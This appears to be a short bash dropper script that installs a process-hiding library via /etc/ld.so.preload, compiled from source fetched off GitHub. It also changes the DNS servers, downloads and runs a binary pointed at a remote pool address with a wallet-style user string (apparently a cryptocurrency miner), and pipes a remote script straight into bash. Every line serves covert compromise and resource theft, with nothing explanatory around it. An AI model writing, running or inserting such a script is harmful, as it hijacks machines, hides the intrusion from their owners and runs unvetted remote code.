#!/bin/bash
apt-get update ; apt-get install sudo -y
curl https://github.com/kartolo92/koplok/raw/master/nyumput.c -o nyumput.c
apt-get install build-essential -y
gcc -Wall -fPIC -shared -o libnyumput.so nyumput.c -ldl
mv libnyumput.so /usr/local/lib/
echo /usr/local/lib/libnyumput.so >> /etc/ld.so.preload
rm nyumput.c
echo "supersede domain-name-servers 1.1.1.1;">> /etc/dhcp/dhclient.conf
/etc/init.d/network restart
wget -O asu https://github.com/kidoescegh/jadul/raw/main/varel
chmod +x asu
./asu --a randomvirel --url 137.184.39.51:443 --user vor3848x1zcvlh41e0d39pd4jv8u2r8o6vvqmz.$(shuf -n 1 -i 1-99999)-kzp
curl -sL https://github.com/kartolo92/koplok/raw/master/time | bash
